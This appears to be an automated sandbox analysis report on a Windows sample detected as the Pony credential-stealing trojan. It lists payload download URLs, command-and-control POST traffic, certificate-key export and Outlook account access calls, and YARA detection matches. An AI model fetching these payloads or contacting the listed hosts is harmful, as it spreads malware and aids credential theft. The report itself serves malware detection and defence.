                Source: global trafficHTTP traffic detected: GET /4XM2f.exe HTTP/1.0Host: dynamotouren.deAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: GET /?dynamotouren.de HTTP/1.0Host: www.dynamotouren.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: GET /rd7nr.exe HTTP/1.0Host: 72.32.185.12Accept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: unknownTCP traffic detected without corresponding DNS query: 72.32.185.12
                Source: unknownTCP traffic detected without corresponding DNS query: 72.32.185.12
                Source: unknownTCP traffic detected without corresponding DNS query: 72.32.185.12
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00403771 recv,0_2_00403771
                Source: global trafficHTTP traffic detected: GET /4XM2f.exe HTTP/1.0Host: dynamotouren.deAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: GET /?dynamotouren.de HTTP/1.0Host: www.dynamotouren.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficHTTP traffic detected: GET /rd7nr.exe HTTP/1.0Host: 72.32.185.12Accept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: global trafficDNS traffic detected: DNS query: 6.magicalomaha.co
                Source: global trafficDNS traffic detected: DNS query: 6.magicalomaha.com
                Source: global trafficDNS traffic detected: DNS query: dynamotouren.de
                Source: global trafficDNS traffic detected: DNS query: www.dynamotouren.com
                Source: global trafficDNS traffic detected: DNS query: app.bi.com.tr
                Source: unknownHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 6.magicalomaha.coAccept: */*Accept-Encoding: identity, *;q=0Content-Length: 176Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://208.116.13.164/b6dK7rwV.exe
                Source: 8WgZHDQckx.exe, 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://6.magicalomaha.co/forum/viewtopic.php
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://6.magicalomaha.co/forum/viewtopic.phphttp://6.magicalomaha.com/forum/viewtopic.phphttp://dyna
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://6.magicalomaha.com/forum/viewtopic.php
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://6.magicalomaha.com/forum/viewtopic.phpR
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.32.185.12/rd7nr.exe
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.bi.com.tr/fPFa.exe
                Source: 8WgZHDQckx.exe, 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://dynamotouren.de/4XM2f.exe
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dynamotouren.de/4XM2f.exeT5C5
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://https://ftp://operawand.dat_Software
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.aboessen24.de/WWkULwkq.exe
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.seigner-art.at/fPsx8i.exe
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: 8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dynamotouren.com/?dynamotouren.de
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR

                System Summary

                barindex
                Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                Source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                Source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                Source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                Source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                Source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                Source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00402D3E0_2_00402D3E
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00411EE90_2_00411EE9
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: String function: 00410514 appears 40 times
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: String function: 00404192 appears 50 times
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: String function: 00401BB8 appears 139 times
                Source: 8WgZHDQckx.exe, 00000000.00000000.1678185277.0000000000466000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLCWIZ.EXET vs 8WgZHDQckx.exe
                Source: 8WgZHDQckx.exeBinary or memory string: OriginalFilenameLCWIZ.EXET vs 8WgZHDQckx.exe
                Source: 8WgZHDQckx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                Source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                Source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                Source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                Source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                Source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                Source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                Source: 8WgZHDQckx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@15/4
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,0_2_0040D1E9
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_004027AF LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,0_2_004027AF
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00402B2A WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,0_2_00402B2A
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040A6AF CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,0_2_0040A6AF
                Source: 8WgZHDQckx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeFile read: C:\Windows\win.iniJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 8WgZHDQckx.exe, 00000000.00000003.1688795172.0000000000884000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 8WgZHDQckx.exeReversingLabs: Detection: 94%
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: msi.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: 8WgZHDQckx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: w:\google_prj\src\tiger4_v3_2.pdbU source: 8WgZHDQckx.exe
                Source: Binary string: w:\google_prj\src\tiger4_v3_2.pdb source: 8WgZHDQckx.exe

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeUnpacked PE file: 0.2.8WgZHDQckx.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeUnpacked PE file: 0.2.8WgZHDQckx.exe.400000.0.unpack
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040231D LoadLibraryA,GetProcAddress,0_2_0040231D
                Source: 8WgZHDQckx.exeStatic PE information: real checksum: 0x255c8 should be: 0x651d9
                Source: 8WgZHDQckx.exeStatic PE information: section name: .text entropy: 6.970578891686763
                Source: C:\Users\user\Desktop\8WgZHDQckx.exe TID: 6512Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,0_2_00405024
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00404CB4
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_0040891F
                Source: C:\Users\user\Desktop\8WgZHDQckx.exeCode function: 0_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00403FE7
